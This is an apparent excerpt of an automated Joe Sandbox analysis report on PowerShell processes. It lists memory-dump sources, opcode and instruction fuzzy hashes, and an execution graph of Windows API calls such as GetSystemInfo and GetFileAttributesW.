                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b3270ab0bebafd6e1a7bc2514299976d169dab966d81a52b0bc2538798b63777
                                                                                                                  • Instruction ID: 7f85bf888ff5862c9fecbe5510ec39442d258e44b724f588c59f3b51fd8edaf5
                                                                                                                  • Opcode Fuzzy Hash: b3270ab0bebafd6e1a7bc2514299976d169dab966d81a52b0bc2538798b63777
                                                                                                                  • Instruction Fuzzy Hash: 5E51F73071C6894FD769DF3C845166A7BD2EF8A204B55C6BEE08AC71E6DE78E8065340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 37b99a6f1c4497e1b5148c141bc490cbf67dfd5d1ac27918ebd3017095d7153b
                                                                                                                  • Instruction ID: c61b8ddd1c3f6ee2d810f3800bd46c7535b82a7744a2a49f328438ed2b1afc35
                                                                                                                  • Opcode Fuzzy Hash: 37b99a6f1c4497e1b5148c141bc490cbf67dfd5d1ac27918ebd3017095d7153b
                                                                                                                  • Instruction Fuzzy Hash: 7A51DC2060D6894FD7A5DF3CC490AB67FD1FF8A214B5487BAE089C75E6CA68E9064341
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d9a281f48276164d84a0e576f0140c7325460000f6d34259f685f88ef8ba1790
                                                                                                                  • Instruction ID: c67c8d45de2c05e1cdf6df71ac442a4416bf813f6dbf1f920e7f8dfba6f7a4e4
                                                                                                                  • Opcode Fuzzy Hash: d9a281f48276164d84a0e576f0140c7325460000f6d34259f685f88ef8ba1790
                                                                                                                  • Instruction Fuzzy Hash: 0C510C2060D6894FE3A5DF3CC4906767FD1FF8A214B5487BAE089CB5E6CE78E9468301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 610120d9bc977195b933b1837d70d657f92fb843339b39c16ba9260e6dc642e1
                                                                                                                  • Instruction ID: f5757a7a526a5371f575abb945f2090cbdaa68fe28bc7584949d80693fda26ae
                                                                                                                  • Opcode Fuzzy Hash: 610120d9bc977195b933b1837d70d657f92fb843339b39c16ba9260e6dc642e1
                                                                                                                  • Instruction Fuzzy Hash: 1541293061D6854FE364DF3CD8456A6B7D1FF86314B0587BAE09AC71E6DE68E5064340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2304ce67ea087cda81ffd881214ffc585ec862fb31c51c26edd3487671f0f343
                                                                                                                  • Instruction ID: 257a4e01ca5e7029eef4be0cb4b6a4dc121200ff47e807584e997be879bbf46b
                                                                                                                  • Opcode Fuzzy Hash: 2304ce67ea087cda81ffd881214ffc585ec862fb31c51c26edd3487671f0f343
                                                                                                                  • Instruction Fuzzy Hash: 0D415A3061D6854FE764DF3CD8416B6BBD1FF86214B0587BAD08AC71E6CE68E5068300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2e633a35eb0fddb540f52b1b307c73e69625e7554ca10ec831154f45de98a530
                                                                                                                  • Instruction ID: 5e21b47e5da72f2d02cbece94052f7c26630039e206e3154406ba4761b7c39eb
                                                                                                                  • Opcode Fuzzy Hash: 2e633a35eb0fddb540f52b1b307c73e69625e7554ca10ec831154f45de98a530
                                                                                                                  • Instruction Fuzzy Hash: 5E41EE2060D6894FE7A5DF3CC4916767FD1FF8A214B5487BAE089CB5E6CA78E9064301
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 297a0c30726607fdd36c9a636b57714bdbda57bd44cf156e9032bc3b6016fdfb
                                                                                                                  • Instruction ID: 51cb493ffb77f5552e1eae63736da49349b8cd76d7681ad2dbf4c1bf91dbfae3
                                                                                                                  • Opcode Fuzzy Hash: 297a0c30726607fdd36c9a636b57714bdbda57bd44cf156e9032bc3b6016fdfb
                                                                                                                  • Instruction Fuzzy Hash: 6F41EA2061D6894FE769DF3CC4517A97BD1FF8A304B5486BEE04ACB5E6DE78E5064300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ae3d92e53c5625aeac2138400ed50687f5fd6357487825c545b685940f864359
                                                                                                                  • Instruction ID: d7c29f6d19fac33f6fae27318fb878723cba417122de6bc60a3537fd5cdf1a1c
                                                                                                                  • Opcode Fuzzy Hash: ae3d92e53c5625aeac2138400ed50687f5fd6357487825c545b685940f864359
                                                                                                                  • Instruction Fuzzy Hash: 5041D93071C6894FE768DF3C845166ABBD2FF8A204B55C6BDD08AC75E6DE78E9065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 65b2263ce811cdbc0fd4f908ca817841965c59300d5042791005e685f219d7d5
                                                                                                                  • Instruction ID: 8aa93331310bb7bf7544875d37b1638bfd1fa5057a3f147bd8948353045e59c6
                                                                                                                  • Opcode Fuzzy Hash: 65b2263ce811cdbc0fd4f908ca817841965c59300d5042791005e685f219d7d5
                                                                                                                  • Instruction Fuzzy Hash: D741D431B1CA488FE768DE3C8451676B7E2FBC9304B11C6BAD44ACB6E6DE74B9064340
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11206347e032cd24ec1756dfaa409a070771bb3243e4cfca54897938090f87f4
                                                                                                                  • Instruction ID: a38ecc6328318a6c9ab3477555023cb2129704e4ac0123039364843ca8836e0f
                                                                                                                  • Opcode Fuzzy Hash: 11206347e032cd24ec1756dfaa409a070771bb3243e4cfca54897938090f87f4
                                                                                                                  • Instruction Fuzzy Hash: A541092071C6894FE768DF3C845167ABBD2FF8A204B55C6BDE08AC75E6DE78E4469300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 78ea5eba32452cadce6710ae261e49646f720032efe7b3d2076db57919c759cd
                                                                                                                  • Instruction ID: 5d185c1756b492e90e01b93b9cd988de6b441603ad8eabb75792425e15d77b6f
                                                                                                                  • Opcode Fuzzy Hash: 78ea5eba32452cadce6710ae261e49646f720032efe7b3d2076db57919c759cd
                                                                                                                  • Instruction Fuzzy Hash: ED41173071C6894FE768DF3C845167ABBD2EF86214B1586BEE08ACB5E6DE74E4079300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cf6a577e025e148e3ccfd7ad61c05db175c18ae60ee0fe44a83d42f34c0362a
                                                                                                                  • Instruction ID: 2320c1d5a81cd86e744edeb00b4c9f7960e7ac3f5e9e71c2d0a560604b0804a5
                                                                                                                  • Opcode Fuzzy Hash: 2cf6a577e025e148e3ccfd7ad61c05db175c18ae60ee0fe44a83d42f34c0362a
                                                                                                                  • Instruction Fuzzy Hash: 7E310A3171C6894FE7A8DF3C84516BAB7D1FF8A214B0586BEE04AC71E6DE78E4065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2454663108.00007FF9BB3B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff9bb3b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 53320d219091a949825102755e9410fe947a38e9240433ab97747612c6f4d301
                                                                                                                  • Instruction ID: eba15ca030741c9a2871e6aca90bcc9c62c392ba5659ca7d921c558d6fd392c3
                                                                                                                  • Opcode Fuzzy Hash: 53320d219091a949825102755e9410fe947a38e9240433ab97747612c6f4d301
                                                                                                                  • Instruction Fuzzy Hash: C031EA3061D6894FE768DF3CC451666B7D1FF86204B1586BDD04AC75E6DE78E9065300
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:3.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:22
                                                                                                                  Total number of Limit Nodes:2
                                                                                                                  execution_graph 52814 7ff9baf75960 52816 7ff9baf75975 52814->52816 52815 7ff9baf75983 52816->52815 52819 7ff9baf6c548 52816->52819 52818 7ff9baf75a2e 52820 7ff9baf6c54d ComputeAccessTokenFromCodeAuthzLevel 52819->52820 52822 7ff9baf6c66e 52820->52822 52822->52818 52832 7ff9baf6629a 52833 7ff9baf662be IdentifyCodeAuthzLevelW 52832->52833 52834 7ff9baf662b3 52832->52834 52835 7ff9baf6631e 52833->52835 52834->52833 52823 7ff9baf54ada 52824 7ff9baf54ae9 52823->52824 52827 7ff9baf53778 52824->52827 52826 7ff9baf54b4f 52828 7ff9baf5377d 52827->52828 52829 7ff9baf6cc03 GetSystemInfo 52828->52829 52831 7ff9baf6cb70 52828->52831 52830 7ff9baf6cc3e 52829->52830 52830->52826 52831->52826 52836 7ff9baf59bc2 52837 7ff9baf59bef GetFileAttributesW 52836->52837 52839 7ff9baf59c86 52837->52839
                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 31276548-0
                                                                                                                  • Opcode ID: eab167d2c86b4a198f455d4244c4984433d857e564667cbef27b908076adf6da
                                                                                                                  • Instruction ID: 4e26f8d5aa16bd410bed6aa8fa6aeb711f8c2be9462cecc098b319f1148e695f
                                                                                                                  • Opcode Fuzzy Hash: eab167d2c86b4a198f455d4244c4984433d857e564667cbef27b908076adf6da
                                                                                                                  • Instruction Fuzzy Hash: DF41113190CA4D4FE718EB6D98467F97BE0EF56321F0042BBD48DC3192EA68B446CB81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 485 7ff9baf59bc2-7ff9baf59c48 489 7ff9baf59c4a-7ff9baf59c4f 485->489 490 7ff9baf59c52-7ff9baf59c84 GetFileAttributesW 485->490 489->490 491 7ff9baf59c8c-7ff9baf59cb1 490->491 492 7ff9baf59c86 490->492 492->491
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 494 7ff9baf6c548-7ff9baf6c66c ComputeAccessTokenFromCodeAuthzLevel 502 7ff9baf6c66e 494->502 503 7ff9baf6c674-7ff9baf6c6a3 494->503 502->503
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1431151113-0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%


                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 74129cec4160a7b37493de929df5aecc795b4a27f5bdfbd4fd907eb4afa2fd99
                                                                                                                  • Instruction ID: a6e311bb6132388d1451a26a811310b5ab5448e5101cb6d1e2c0b69cd78fe5ec
                                                                                                                  • Opcode Fuzzy Hash: 74129cec4160a7b37493de929df5aecc795b4a27f5bdfbd4fd907eb4afa2fd99
                                                                                                                  • Instruction Fuzzy Hash: 33D14C30A18A098FEB98EF1CC495BA977E2FF59700F5501AAD50DC72E2DE65FC418780
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f2ad37b8d7a9740b5283595e5bbd9f5b140099f3326ef7d9a55af007096c386
                                                                                                                  • Instruction ID: b347c4490c06cfe19494d90e6f4fa2fc11138e6d3790bb52d77a7042e6b67f49
                                                                                                                  • Opcode Fuzzy Hash: 5f2ad37b8d7a9740b5283595e5bbd9f5b140099f3326ef7d9a55af007096c386
                                                                                                                  • Instruction Fuzzy Hash: D6A13712F1CE5A0BF279EE1C64863B922C1EF9A7A9B0541BAD54DC72E2DD1DFD0242C0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6fe1afb963266fc18b21db707e909c9f6ec6b703e57ca30bb25af44189666171
                                                                                                                  • Instruction ID: 42999260933d39b998db9d6da20b1490f08439d54972979706e19b38572ade56
                                                                                                                  • Opcode Fuzzy Hash: 6fe1afb963266fc18b21db707e909c9f6ec6b703e57ca30bb25af44189666171
                                                                                                                  • Instruction Fuzzy Hash: E7C1FE32A1CA464FE758DF1EE4426A57391FB90310F5005BDD19AC71E3DEAAB942C782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cc298b2e097e6bbd10ac434aad807ddff4cbc90d41453b1f145a72ef73d3bf8
                                                                                                                  • Instruction ID: bc8b0bb6eb371509d7f22b0629d4fed2d388a5d1b1370585dc21449a727ca13c
                                                                                                                  • Opcode Fuzzy Hash: 2cc298b2e097e6bbd10ac434aad807ddff4cbc90d41453b1f145a72ef73d3bf8
                                                                                                                  • Instruction Fuzzy Hash: 8BA16D31A08A198FEB98EF2C8851BA977E1FF99314F5441A9D04DD32D2DE75AD42CB80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6b7414313f9384c1d06c9e11f579e9ba37eaab66a5a91ae6898cbbee79902cf
                                                                                                                  • Instruction ID: 8a8e027ebabd2a804bc10f776879e3773adfc8cf9b7fb93f2709ca4980422ec2
                                                                                                                  • Opcode Fuzzy Hash: d6b7414313f9384c1d06c9e11f579e9ba37eaab66a5a91ae6898cbbee79902cf
                                                                                                                  • Instruction Fuzzy Hash: 93913831A0DA894FE795EF6C88652B97BE1FF5A210F0401BAD44DC72E3DE69B901C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2181b21a0309d79a9ceacc5efa26a54718f9ee164980dcf52afcaf92d1d7d145
                                                                                                                  • Instruction ID: 92f378fd01a11aec6227b272c3526ac90d4c3329dc50d3cdf0622e6288535249
                                                                                                                  • Opcode Fuzzy Hash: 2181b21a0309d79a9ceacc5efa26a54718f9ee164980dcf52afcaf92d1d7d145
                                                                                                                  • Instruction Fuzzy Hash: 78612A32A0D56A4EE719DE6CAC466F577D0FF42230F14017EE5CAC31E2E959B9838390
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4e58ab4d6ae92e8f998e80493a9ef218fb1574cfe6fbddb864c15fc6b76d7ca5
                                                                                                                  • Instruction ID: e3cdcf45c57d65cba1c835c18632b5499d841fb804f1dcc2861445afcb65a05d
                                                                                                                  • Opcode Fuzzy Hash: 4e58ab4d6ae92e8f998e80493a9ef218fb1574cfe6fbddb864c15fc6b76d7ca5
                                                                                                                  • Instruction Fuzzy Hash: 8D81E530A0C95A4FE794EF2C884476AB7E1FF9A310F5546BAD14DC72E2DE68AC41C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 938b3e9ae174cbee7031eb0f8a6b8d4ea26abdbed75f8dc1f54fc75761172d94
                                                                                                                  • Instruction ID: 494fc3ea0b86c552744867a53455377774744ff80995d1d802f52f1dfc905300
                                                                                                                  • Opcode Fuzzy Hash: 938b3e9ae174cbee7031eb0f8a6b8d4ea26abdbed75f8dc1f54fc75761172d94
                                                                                                                  • Instruction Fuzzy Hash: 6F711220A0CD5A4FE795EB2C8849736B7E1FF9A310F4542BAD14DCB2E2DE68AC41C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8532b310716fa0883df285b5ea6accac4b7ad1b33376a21ef3c66e5bf0ebc478
                                                                                                                  • Instruction ID: 54b0847e8c3001497a6ad2431184b6b068b56acd7dabc28cd2b99ef1b682b0b4
                                                                                                                  • Opcode Fuzzy Hash: 8532b310716fa0883df285b5ea6accac4b7ad1b33376a21ef3c66e5bf0ebc478
                                                                                                                  • Instruction Fuzzy Hash: 8F719B31E08A1A8FEB94EF2C84497F977A1FF59310F10047AE95DC72D2CE68B9468B40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01235e2dc70609e072e442f9f7831c48829f3e52fd2bf4d3f5712deb9f72151a
                                                                                                                  • Instruction ID: ae0e11fe3926551db3165abdcafbbe9301b7de7190d9dc54972ba02db70e4b46
                                                                                                                  • Opcode Fuzzy Hash: 01235e2dc70609e072e442f9f7831c48829f3e52fd2bf4d3f5712deb9f72151a
                                                                                                                  • Instruction Fuzzy Hash: 5551482091DA864FE74AAB6888563667BD0FF56310F4941FAD08DCB1E3DD5CB842C782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 490c33984a3d34d6bdbd48a4eefaffd3e34c7bc06e0b59dc01fcd8ec4da1f06d
